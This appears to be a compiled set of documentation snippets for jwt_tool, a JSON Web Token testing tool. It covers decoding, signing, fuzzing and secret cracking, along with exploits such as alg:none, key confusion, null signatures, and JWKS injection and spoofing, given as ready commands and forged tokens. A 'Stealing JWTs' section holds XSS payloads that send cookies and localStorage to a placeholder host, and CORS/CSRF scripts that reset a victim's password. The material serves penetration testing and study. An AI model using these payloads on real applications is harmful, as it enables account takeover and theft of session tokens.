### Install Dependencies with Pip Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Install the required Python dependencies for jwt_tool using pip. ```bash $ python3 -m pip install termcolor cprint pycryptodomex requests ``` -------------------------------- ### Install Colorama for Windows Fix Source: https://github.com/ticarpi/jwt_tool/blob/master/README.md Install the colorama library using pip, required for fixing color issues in Windows cmd/Powershell. ```bash python3 -m pip install colorama ``` -------------------------------- ### Complex Token Generation: Fuzz and Exploit Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Chain options to perform complex token generation. This example injects claims, fuzzes values, and then signs using the 'alg:none' exploit. ```bash $ python3 jwt_tool.py JWT_HERE -I -pc image_path -pv path_traversal_tests.txt -X a ``` -------------------------------- ### Send Token to Web Application Source: https://github.com/ticarpi/jwt_tool/blob/master/README.md This example shows how to send a JWT token directly to a web application. It includes specifying the target URL, request headers, cookies, and a canary value for verification. ```bash $ python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -rh "Origin: null" -cv "Welcome" -M er ``` -------------------------------- ### Base64 Encoding Example Source: https://github.com/ticarpi/jwt_tool/wiki/JWT-Primer Demonstrates the base64 encoding of JWT header and payload, and their concatenation with a dot. ```text Header: {"alg":"HS256","typ":"JWT"} Payload: {"login":"ticarpi"} Are encoded as: Header: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9 Payload: eyJsb2dpbiI6InRpY2FycGkifQ== These are stripped and joined as: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ ``` -------------------------------- ### Start Interactive Tampering Mode Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Begin an interactive session to tamper with the header and payload claims of a JWT. ```bash $ python3 jwt_tool.py JWT_HERE -T ``` -------------------------------- ### CVE-2016-5431 Key Confusion Attack Example Source: https://github.com/ticarpi/jwt_tool/wiki/Known-Exploits-and-Attacks This example shows a Key Confusion attack where an HMAC variant algorithm is used, and the token is signed using the public key as the secret. This tricks the service into verifying the HMAC token with the public key. ```plaintext eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.I3G9aRHfunXlZV2lyJvWkZO0I_A_OiaAAQakU_kjkJM ``` -------------------------------- ### CVE-2020-28042 Null Signature Attack Example Source: https://github.com/ticarpi/jwt_tool/wiki/Known-Exploits-and-Attacks This example demonstrates a JWT with a null signature, exploiting libraries that fail to verify zero-length signatures. The signature part is omitted after the second dot. ```plaintext eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ. ``` -------------------------------- ### Send Token to Application with Cookies and Canary Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Send a JWT to a target URL, including request cookies and a canary value for verification. This example uses the 'forced errors' scan mode. ```bash $ python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=JWT_HERE;anothercookie=test" -rh "Origin: null" -cv "Welcome" -M er ``` -------------------------------- ### CVE-2015-9235 alg:none Attack Example Source: https://github.com/ticarpi/jwt_tool/wiki/Known-Exploits-and-Attacks This example demonstrates the 'alg:none' attack where the signature portion of the JWT is omitted. Some libraries or server configurations may accept this unsigned token. ```plaintext eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJsb2dpbiI6InRpY2FycGkifQ. ``` -------------------------------- ### CVE-2018-0114 Key Injection Attack Example Source: https://github.com/ticarpi/jwt_tool/wiki/Known-Exploits-and-Attacks This example illustrates a Key Injection attack where an attacker signs a token with a new private key and includes the corresponding public key within the token itself for verification. ```plaintext eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImp3ayI6eyJrdHkiOiJSU0EiLCJraWQiOiJURVNUIiwidXNlIjoic2lnIiwiZSI6IkFRQUIiLCJuIjoidTdzRU00RmlvT3J6ODFPSENBUGRUZjNncUc4dm12NVJOUndTd0t4X3RqMHBsRjlrdmtEUHVMTDRVa3JqTnVCMWNHdU1hanFxR0xTZXpRQ0xBWmRldC0td3FSbVRfVGNVeGtieVZMV1JiUUg5UWNJRVM0UXpuc20yckR0Wnp4U1VHNnVlNzBBRm1EZkdiSkVQMGI5Nkllc0JfNlBTOS1FWXdLXzl5X3ZwRTloZTNNTUo4WEROSVM5amNSUkNqc21DVldQb1BGX01NcUZjZmZfeWZPNDRPQkVSZWdOOHB2b19UX3Bial91ZkU2X1pGek80VUl6QkNzRUR4RE5mZk9RRkdNRzZoaXRjQm8wTmJSUkFVYUY3dmhMYVRkQjNjRXdPLWVoNEZpSm9nRVRMZGxPRVFXRlZCZldLUWh1YWJEU0FnWGZQOUNXbXh1Smg5YzNRX0tMZFF3In19.eyJsb2dpbiI6InRpY2FycGkifQ.jFu8Kewp-tJ4uLVTRm6D5wBkbikNtLufGHa8ZmEutAZyrPETaD5JaLHZ8Mlw6zBxCNKzmAXbEaDGtNoQ6rfIGHwiTwzk2C897HNR-vwTAyHh7lAgixelqrlkAP7OBWEALH_u7QuIDZpu79V4Aur9CzYai9UvaLqsHhFLf4Gwha9CGV68BnO_Cxye_5vRhzcWEPXIAp8DQMHEDovS6NF_CTEvKA8I6jp2nb726m0nLJo-WWKlCF0UNwSGZ3R3A0YFPL-I1Ld6_8W2dIZRKt4PAtEAPde-RIyf9vKWaHsQDaxnI40xxN3IwvkB2-nDUaTLZtVwBBiTEMoUrkoNTY6XKg ``` -------------------------------- ### JWKS Spoofing Attack Example Source: https://github.com/ticarpi/jwt_tool/wiki/Known-Exploits-and-Attacks This example shows a JWT that uses the 'jku' header to point to an attacker-controlled JWKS URL. This allows the attacker to provide a malicious public key for token verification. ```plaintext eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHBzOi8vdGljYXJwaS5jb20vandrcy5qc29uIn0.eyJsb2dpbiI6InRpY2FycGkifQ.FgnNEj7qm6PPQCCL_f6krxcTSg4uKJSOQf2kTNOQQty25o9ON1SkEpuRgbg54TOjBz7hoqCKc9qRP6GcFy4-5vPVh_lk8x9lQmm7A34Bqkmr41Y8oCIKzlxrdqRxm-gVRkrAXti5slICzRijThkTixe2oem4_q4_8jP01jjuVTK-h3h2ZBQ7GvICEbOTv2ffd_IB-EF6Aua4Mt1164SNamvq3XQ58pLRuZCiR2wjoj1rJ8IkND3pRfg-ziYc86RSLEqq44HCQZ9Suq2r9XGrPkKUE30O6hFCrWJYfaQUTAya8PndhxWrgV5WRzIHYA9Br0kQ29q0DUz-GESLRaK2Ww ``` -------------------------------- ### Hashcat Brute Force Attack for HMAC Secrets Source: https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology Initiate a brute force attack with hashcat to crack HMAC secrets. This example targets passwords with specific character sets and minimum lengths. ```bash hashcat -a 3 -m 16500 jwt.txt ?u?l?l?l?l?l?l?l -i --increment-min=6 ``` -------------------------------- ### Fix Color Bug in Windows Source: https://github.com/ticarpi/jwt_tool/blob/master/README.md To fix broken colors in Windows cmd/Powershell, uncomment these lines in jwt_tool.py and install the colorama library. ```python # import colorama # colorama.init() ``` -------------------------------- ### Exploit Token with alg:none Source: https://github.com/ticarpi/jwt_tool/blob/master/README.md This snippet demonstrates how to run a specific exploit, such as the 'alg:none' exploit, by selecting the exploit option (-X) and the vulnerability type ('a'). ```bash $ python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw -X a ``` -------------------------------- ### Basic jwt_tool Usage Source: https://github.com/ticarpi/jwt_tool/blob/master/README.md Run jwt_tool with a JWT as the first argument to decode and validate it. Alternatively, use the Docker base command. ```bash $ python3 jwt_tool.py ``` ```bash $ docker run -it --network "host" --rm -v "${PWD}:/tmp" -v "${HOME}/.jwt_tool:/root/.jwt_tool" ticarpi/jwt_tool ``` -------------------------------- ### Display jwt_tool Usage Information Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Run jwt_tool with the -h flag to view its usage instructions and available options. ```bash $ python3 jwt_tool.py -h ``` -------------------------------- ### Run jwt_tool with Docker Source: https://github.com/ticarpi/jwt_tool/blob/master/README.md This is the base command for running jwt_tool using Docker. It sets up network, removes the container on exit, maps the current directory to /tmp inside the container, and maps the user's jwt_tool configuration directory. ```bash docker run -it --network "host" --rm -v "${PWD}:/tmp" -v "${HOME}/.jwt_tool:/root/.jwt_tool" ticarpi/jwt_tool ``` -------------------------------- ### Signature Generation and Encoding Source: https://github.com/ticarpi/jwt_tool/wiki/JWT-Primer Illustrates the process of generating a signature with a secret key and then base64 encoding it for the final JWT. ```text The Signature is generated by *signing* the preceding data with a *secret* or *key*: \x6e\xc4\xb0\xaa\x3d\x9c\xda\xe2\x3d\x9f\xbf\x9a\x8e\x68\xb7\x8b\x15\x46\x84\xf5\x22\x63\xb8\xce\xf5\x25\x27\xf5\xd9\xb5\xe4\xfa The Signature is then base64 encoded: bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po= ...and finally stripped and concatenated as the final token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po ``` -------------------------------- ### Monitor Real-time HTTP Traffic Source: https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology Use tail to follow the real-time HTTP traffic logging on your webserver. ```bash tail -f /var/log/apache2/access.log ``` -------------------------------- ### Playbook Scan of JWT Implementation Source: https://github.com/ticarpi/jwt_tool/blob/master/README.md Execute a Playbook Scan against a web application using a provided JWT token to identify common misconfigurations. This is part of the Scanning phase. ```bash $ python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -M pb ``` -------------------------------- ### Verify Token with Public Key Source: https://github.com/ticarpi/jwt_tool/blob/master/README.md Use this command to verify a JWT token, providing the Public Key in PEM format using the -pk option. This is essential for validating token authenticity. ```bash $ python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw -V -pk public.pem ``` -------------------------------- ### Run Playbook Scan Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Execute a Playbook Scan against a target URL using a JWT and specified request cookies. ```bash $ python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=JWT_HERE;anothercookie=test" -M pb ``` -------------------------------- ### Verify JWT with Public Key Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Verify a JWT's signature using a provided public PEM key file. ```bash $ python3 jwt_tool.py JWT_HERE -V -pk my_public.pem ``` -------------------------------- ### Use 'none' Algorithm for Unvalidated Tokens Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Create unvalidated tokens by explicitly using the 'none' algorithm. ```bash $ python3 jwt_tool.py JWT_HERE -X a ``` -------------------------------- ### Clone jwt_tool Repository Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Clone the jwt_tool repository from GitHub to your local system. ```bash $ git clone https://github.com/ticarpi/jwt_tool ``` -------------------------------- ### Sign Token with Known Key/Password Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Sign a token using a specified algorithm and a known private key or password. ```bash $ python3 jwt_tool.py JWT_HERE -S ec512 -pk jwttool_custom_private_EC.pem ``` ```bash $ python3 jwt_tool.py JWT_HERE -S hs256 -p jwt-secret-key ``` -------------------------------- ### Fuzzing JWT for Unexpected Behaviors Source: https://github.com/ticarpi/jwt_tool/blob/master/README.md Use this command for Fuzzing to test for unexpected values and claims, identifying potential application vulnerabilities or logic errors in token processing. It includes custom SQLi vectors. ```bash $ python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -I -hc kid -hv custom_sqli_vectors.txt ``` -------------------------------- ### Key Confusion Attack (Asymmetric Ciphers) Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Perform a 'key-confusion' attack against asymmetric ciphers (RS-, EC-, PS-) when a known Public Key is available. ```bash $ python3 jwt_tool.py JWT_HERE -X k -pk my_public.pem ``` -------------------------------- ### Query Logfile by Request ID Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Read request details and token data from the logfile by querying using a unique request or token ID. ```bash $ python3 jwt_tool.py -Q jwttool_2c9c0b6a92d982148241ea599e7c5871 ``` -------------------------------- ### Decode JWT Header using Linux base64 Source: https://github.com/ticarpi/jwt_tool/wiki/JWT-Primer Demonstrates how to decode the base64 encoded JWT header using the Linux 'base64' command-line tool. ```bash $ echo eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9 | base64 -d {"typ":"JWT","alg":"HS256"} ``` -------------------------------- ### Verify JWT with JWKS Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Verify a JWT's signature using a provided public JWKS JSON file. ```bash $ python3 jwt_tool.py JWT_HERE -V -jw my_public_jwks.json ``` -------------------------------- ### Exploit RSA Key Confusion with jwt_tool Source: https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology Employ jwt_tool to test for RSA key confusion vulnerabilities. This requires a public key file and attempts to forge a new token. ```bash python3 jwt_tool.py JWT_HERE -X k -pk my_public.pem ``` -------------------------------- ### Test 'kid' Path Traversal Source: https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology Use jwt_tool to tamper the JWT and change the value of the kid claim, then choose to keep the original signature. ```bash python3 jwt_tool.py JWT_HERE -T ``` -------------------------------- ### JWT Encoding Variations Source: https://github.com/ticarpi/jwt_tool/wiki/JWT-Primer Illustrates the differences between URL-safe base64, standard base64, and URL-encoded base64 for JWTs. ```text * URL-Safe B64: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.ZHe_3OPuWfBu-x759-tuA2XUsY-tXodAiKSybwJozrA * Standard B64: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.ZHe/3OPuWfBu+x759+tuA2XUsY+tXodAiKSybwJozrA * URL-Encoded: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.ZHe%2F3OPuWfBu%3Bx759%3BtuA2XUsY%3BtXodAiKSybwJozrA ``` -------------------------------- ### Test JWKS Injection (CVE-2018-0114) Source: https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology Use jwt_tool to inject a custom JWKS containing the auto-generated Public Key, and sign the token with the corresponding Private Key. ```bash python3 jwt_tool.py JWT_HERE -X i ``` -------------------------------- ### Process and Decode JWT Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Process a JWT and display its decoded claims and values. ```bash $ python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po ``` -------------------------------- ### Decode JWT Header using Windows CMD Source: https://github.com/ticarpi/jwt_tool/wiki/JWT-Primer A workaround for Windows CMD to decode a base64 encoded JWT header using 'certutil'. ```batch C:\>echo eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9 > file.txt && certutil -decode -f file.txt outfile.txt && type outfile.txt Input Length = 40 Output Length = 27 CertUtil: -decode command completed successfully. {"typ":"JWT","alg":"HS256"} ``` -------------------------------- ### Collect Interactions with tcpdump Source: https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology Use tcpdump to collect interactions on port 80 of the specified interface. ```bash sudo tcpdump -A 'tcp dst port 80' -i eth0 ``` -------------------------------- ### Fuzzing JWT Claims with jwt_tool Source: https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology Use this command to fuzz specific headers and payload claims in a JWT. Ensure fuzzing_list.txt contains the values to test. ```bash python3 jwt_tool.py JWT_HERE -I -hc header1 -hv fuzzing_list.txt -hc header2 -hv testval2 -pc payload1 -pv testval3 ``` -------------------------------- ### Crack HMAC Secret with jwt_tool Source: https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology Use jwt_tool's cracking mode with a dictionary file to attempt verification of the HMAC secret against a list of potential passwords. ```bash python3 jwt_tool.py JWT_HERE -C -d dictionary.txt ``` -------------------------------- ### Fuzzing JWT Claims with jwt_tool and a Test File Source: https://github.com/ticarpi/jwt_tool/wiki/Tampering-and-Fuzzing Inject a sequence of values from a file into a specified JWT payload claim using the -I flag. This is effective for testing injection attacks like path traversal against a live application endpoint. ```bash $ python3 jwt_tool.py JWT_HERE -I -pc image_path -pv path_traversal_tests.txt -S es512 -pk jwttool_custom_private_EC.pem -t https://www.ticarpi.com/ -rc "jwt=JWT_HERE;anothercookie=test" ``` -------------------------------- ### Fuzz Claims with Text File Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Fuzz values for header or payload claims by specifying a text file for one value. Other claims can be set normally. ```bash $ python3 jwt_tool.py JWT_HERE -I -hc header1 -hv fuzzing_list.txt -hc header2 -hv testval2 -pc payload1 -pv testval3 ``` -------------------------------- ### Crack Secret Key (HMAC) Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Attempt to crack or guess the secret key for HMAC algorithms using a dictionary file or a specific password. ```bash $ python3 jwt_tool.py JWT_HERE -C -d dictionary.txt ``` ```bash $ python3 jwt_tool.py JWT_HERE -C -p password_here ``` -------------------------------- ### Test JWKS Spoofing Source: https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology When using jwt_tool, ensure the jwtconf.ini file has been updated with the location of your personal JWKS. Then, use jwt_tool to spoof the JWKS. ```bash python3 jwt_tool.py JWT_HERE -X s ``` -------------------------------- ### Read Token Claims Source: https://github.com/ticarpi/jwt_tool/blob/master/README.md This command is used in the Recon phase to read the claims and values within a JWT token, helping to understand the expected data in the application. ```bash $ python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw ``` -------------------------------- ### Extract Public Key from SSL Certificate Source: https://github.com/ticarpi/jwt_tool/wiki/Finding-Public-Keys Use OpenSSL to extract the public key from a server's SSL certificate. This is useful when the token might be signed with the server's private key. ```bash $ openssl s_client -connect example.com:443 2>&1 < /dev/null | sed -n '/-----BEGIN/,/-----END/p' > certificatechain.pem $ openssl x509 -pubkey -in certificatechain.pem -noout > pubkey.pem ``` -------------------------------- ### Hashcat Dictionary Attack for HMAC Secrets Source: https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology Perform a dictionary attack using hashcat to crack HMAC secrets. Requires a JWT token saved to 'jwt.txt' and a wordlist. ```bash hashcat -a 0 -m 16500 jwt.txt wordlist.txt ``` -------------------------------- ### Tamper JWT Claims with jwt_tool Source: https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology Use this command to enter tamper mode for a JWT token. Follow the menu to modify claims and optionally set signing or exploit options. ```bash python3 jwt_tool.py [token] -T ``` ```bash python3 jwt_tool.py [token] -T -X ``` ```bash python3 jwt_tool.py [token] -T -S ``` -------------------------------- ### Decode JWT Header using Browser JavaScript Source: https://github.com/ticarpi/jwt_tool/wiki/JWT-Primer Shows how to decode a base64 encoded JWT header using the 'atob' function in a browser's JavaScript console. ```javascript >> atob("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9") "{"typ":"JWT","alg":"HS256"}" ``` -------------------------------- ### Hashcat Rule-Based Attack for HMAC Secrets Source: https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology Execute a rule-based attack with hashcat to crack HMAC secrets. This method applies transformation rules to a password list. ```bash hashcat -a 0 -m 16500 jwt.txt passlist.txt -r rules/best64.rule ``` -------------------------------- ### Inject Inline JWKS Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Inject an inline JWKS into the JWT header. This involves exporting the Public Key as a JWK object and then signing the token with the Private Key. ```bash $ python3 jwt_tool.py JWT_HERE -X i ``` -------------------------------- ### Exploit 'none' Algorithm Vulnerability with jwt_tool Source: https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology Use jwt_tool to test for the 'none' algorithm vulnerability by switching the algorithm and removing the signature. This checks if the page remains valid without a signature. ```bash python3 jwt_tool.py JWT_HERE -X a ``` -------------------------------- ### Exploit JWT with Inject JWKS Source: https://github.com/ticarpi/jwt_tool/blob/master/README.md This snippet demonstrates the Exploitation phase, using the 'Inject JWKS' exploit (-X i) to inject a new username ('admin') by specifying the claim name and value. ```bash $ python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -X i -I -pc name -pv admin ``` -------------------------------- ### Injecting and Signing JWT Claims with jwt_tool Source: https://github.com/ticarpi/jwt_tool/wiki/Tampering-and-Fuzzing Use the -I flag to inject custom header and payload claims, then sign the modified JWT. Useful for testing various attack vectors by altering existing claims or adding new ones. ```bash $ python3 jwt_tool.py JWT_HERE -I -hc header1 -hv testval1 -hc header2 -hv testval2 -pc payload1 -pv testval3 -S hs256 -p jwt-secret-key ``` -------------------------------- ### Test Null Signature (CVE-2020-28042) Source: https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology Use jwt_tool to delete the signature from the end of the token. If vulnerable, the application will fail to check the signature. ```bash python3 jwt_tool.py JWT_HERE -X n ``` -------------------------------- ### Inject Header and Payload Claims Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Inject or modify header and payload claims. Claims and their values can be matched evenly using specific flags. ```bash $ python3 jwt_tool.py JWT_HERE -I -hc header1 -hv testval1 -hc header2 -hv testval2 -pc payload1 -pv testval3 ``` -------------------------------- ### Decode JWT Header using PowerShell Source: https://github.com/ticarpi/jwt_tool/wiki/JWT-Primer Provides a PowerShell command to decode a base64 encoded JWT header using .NET's Base64 and UTF8 classes. ```powershell PS C:\> [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9")) {"typ":"JWT","alg":"HS256"} ``` -------------------------------- ### Tamper with Existing Token Source: https://github.com/ticarpi/jwt_tool/blob/master/README.md Use this command to tamper with an existing JWT token. This is useful for testing how an application handles modified tokens. ```bash $ python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw -T ``` -------------------------------- ### Spoof Remote JWKS Source: https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool Spoof a remote JWKS by serving auto-generated RSA keys and signing the token with the Private Key. The JWKS URL can be provided via command line or config file. ```bash $ python3 jwt_tool.py JWT_HERE -X s -ju http://example.com/my_jwks.json ``` -------------------------------- ### XHR CORS Attack to Retrieve JWT Source: https://github.com/ticarpi/jwt_tool/wiki/Stealing-JWTs This JavaScript code demonstrates an XHR request to a target website, exploiting CORS misconfiguration to potentially retrieve a JWT returned in HTTP responses (e.g., refresh tokens). Ensure 'withCredentials' is set to true to send cookies. ```javascript var xhr = new XMLHttpRequest(); xhr.open("GET", "http://www.avictimwebsitewithJWTcookieauth.com/api/refreshtoken"); xhr.withCredentials = true; xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8"); xhr.send(); ``` -------------------------------- ### Regex for Finding JWTs in Burp Search Source: https://github.com/ticarpi/jwt_tool/blob/master/README.md Use these regular expressions in Burp Suite's search functionality to identify JWTs. Ensure 'Case sensitive' and 'Regex' options are enabled. ```regex [= ]eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9._-]* ``` ```regex [= ]eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]* ``` -------------------------------- ### Steal JWT from LocalStorage/SessionStorage via XSS Source: https://github.com/ticarpi/jwt_tool/wiki/Stealing-JWTs This XSS payload captures the contents of LocalStorage and sends it to an attacker-controlled server. ```javascript new Image().src = 'http://example.com/log.php?localStorage='+JSON.stringify(window['localStorage']); ``` -------------------------------- ### Steal JWT from Cookie via XSS Source: https://github.com/ticarpi/jwt_tool/wiki/Stealing-JWTs Use this XSS payload to steal JWTs stored in cookies, provided they are not set as HTTPOnly. ```javascript document.location='http://example.com/cookiestealer.php?c='+document.cookie; ``` -------------------------------- ### XHR CSRF Attack to Reset Password Source: https://github.com/ticarpi/jwt_tool/wiki/Stealing-JWTs This JavaScript code uses XMLHttpRequest to perform a POST request, exploiting CORS misconfiguration to reset a user's password. It leverages JWTs sent via cookies automatically by the browser. ```javascript var xhr = new XMLHttpRequest(); xhr.open("POST", "http://www.avictimwebsitewithJWTcookieauth.com/api/passwordreset"); xhr.withCredentials = true; xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8"); xhr.send('{"newpass":"BadGuyKnowsThis!"}'); ``` -------------------------------- ### CSRF Attack to Reset Password Source: https://github.com/ticarpi/jwt_tool/wiki/Stealing-JWTs This HTML form, when submitted by a victim, can be used in a CSRF attack to reset their password, leveraging JWTs sent automatically by the browser in cookies. ```html
``` -------------------------------- ### Steal JWT from JavaScript Variable via XSS Source: https://github.com/ticarpi/jwt_tool/wiki/Stealing-JWTs If a JWT is stored in a known JavaScript variable, this XSS payload can exfiltrate its value. ```javascript document.location='http://example.com/?password='+secretPasswordVariable; ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.